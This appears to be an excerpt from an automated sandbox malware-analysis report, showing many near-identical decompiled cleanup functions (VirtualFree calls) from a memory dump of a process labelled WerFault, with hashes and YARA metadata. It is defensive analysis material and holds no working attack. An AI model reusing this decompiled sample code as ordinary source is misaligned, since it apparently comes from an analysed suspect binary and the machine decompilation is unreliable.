                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881E01 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881E01(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: c83355f2dcc59367969fbba9e47853e2c32be66b8c8c4211190f64edbf5892c4
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: c83355f2dcc59367969fbba9e47853e2c32be66b8c8c4211190f64edbf5892c4
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881E29 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881E29(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: a23e626f36b48bf964a377ff2ecc8c3c6a8efe2e190634e43ee16465abee1f4e
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: a23e626f36b48bf964a377ff2ecc8c3c6a8efe2e190634e43ee16465abee1f4e
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881E62 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881E62(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: fd2a189d81406adf58addfe5bd1f969336a822ef53cdcf3c3e149b84824ba322
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: fd2a189d81406adf58addfe5bd1f969336a822ef53cdcf3c3e149b84824ba322
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881F82 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881F82(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: aad9033b642ef9ae16e90c372f344181d3fa6c362ed1a0a048d0502159ae28c4
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: aad9033b642ef9ae16e90c372f344181d3fa6c362ed1a0a048d0502159ae28c4
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881F16 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881F16(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 78e306b7a0c62c34d2a068d561d293c01981b24c7328eb68afa0bb217289c97c
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 78e306b7a0c62c34d2a068d561d293c01981b24c7328eb68afa0bb217289c97c
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881C06 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881C06(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 0bc737f0b483573194721a43e2679675241b0b28bc17263651f515b218c26e1c
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 0bc737f0b483573194721a43e2679675241b0b28bc17263651f515b218c26e1c
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881C20 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881C20(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 3dbadbd02b5dc21bb9f75983b927afc0a22f1f5445523dba9b348c04d69320e1
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 3dbadbd02b5dc21bb9f75983b927afc0a22f1f5445523dba9b348c04d69320e1
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881C39 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881C39(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 7b4490cab8e7df1a80e75c376ef36dd5c93efc42b05a53f79c779dc1ae71b47c
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 7b4490cab8e7df1a80e75c376ef36dd5c93efc42b05a53f79c779dc1ae71b47c
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881C5E Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881C5E(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 510deb21a893fdb4b9c245bba78a4cd162b7d80ba90573a82f9db385f46e0c98
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 510deb21a893fdb4b9c245bba78a4cd162b7d80ba90573a82f9db385f46e0c98
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881DE5 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881DE5(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: 47efcf5e3aa22e9f05e600b6aa2de3c6c34fd0fd8a6ee3991f7257d9d952fdb3
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: 47efcf5e3aa22e9f05e600b6aa2de3c6c34fd0fd8a6ee3991f7257d9d952fdb3
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881D18 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881D18(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: f93ec54997cc57fb8d0b805183813b92214eae9f688c3d4298621f1d326365d1
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: f93ec54997cc57fb8d0b805183813b92214eae9f688c3d4298621f1d326365d1
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881D43 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881D43(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
				}
				if( *((intOrPtr*)(_t22 - 0x2a4)) != 0 &&  *((intOrPtr*)(_t22 - 0x80)) == 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x2a4)));
				}
				if( *((intOrPtr*)(_t22 - 0x70)) != 0) {
					E028617E4( *((intOrPtr*)(_t22 - 0x70)));
				}
				_t13 = 0xfffffff9;
				return _t13;
			}





                        0x028821ac
                        0x028821b5
                        0x028821c1
                        0x028821c1
                        0x028821cb
                        0x028821d0
                        0x028821d0
                        0x028821dd
                        0x028821eb
                        0x028821eb
                        0x028821f5
                        0x028821fa
                        0x028821fa
                        0x02882201
                        0x02882206

                        APIs
                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00002672,00000000,00000000,00000000,00000478,?,0000002A,?,00000012,?,00000208,00000000), ref: 028821C1
                        Memory Dump Source
                        • Source File: 00000004.00000002.568316371.0000000002860000.00000040.80000000.00040000.00000000.sdmp, Offset: 02860000, based on PE: true
                        • Associated: 00000004.00000002.568917282.0000000002887000.00000020.80000000.00040000.00000000.sdmpDownload File
                        • Associated: 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_2860000_WerFault.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeVirtual
                        • String ID:
                        • API String ID: 1263568516-0
                        • Opcode ID: a635acd69f0d7ef709cb39edba54375991e2ebdd5839360059197b1bb84cbb45
                        • Instruction ID: 5858143b66a95c1f6da17752774b388300bff7293b986d2838c94329cebc7033
                        • Opcode Fuzzy Hash: a635acd69f0d7ef709cb39edba54375991e2ebdd5839360059197b1bb84cbb45
                        • Instruction Fuzzy Hash: 72F0493DA0016ADFDF216B98EC0C7ECB672BF0031AF240121E615F04E9CBB52995DE00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 02881D60 Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                        Download Yara Rule
                        C-Code - Quality: 50%
                        			E02881D60(void* __eflags) {
				void* _t13;
				void* _t22;

				E02880F3D(_t22 - 0x30,  *((intOrPtr*)(_t22 - 0x2a4)));
				if( *(_t22 - 0x10) != 0) {
					VirtualFree( *(_t22 - 0x10), 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t22 - 0x1c)) != 0) {
					 *0x289f824( *((intOrPtr*)(_t22 - 0x1c)));
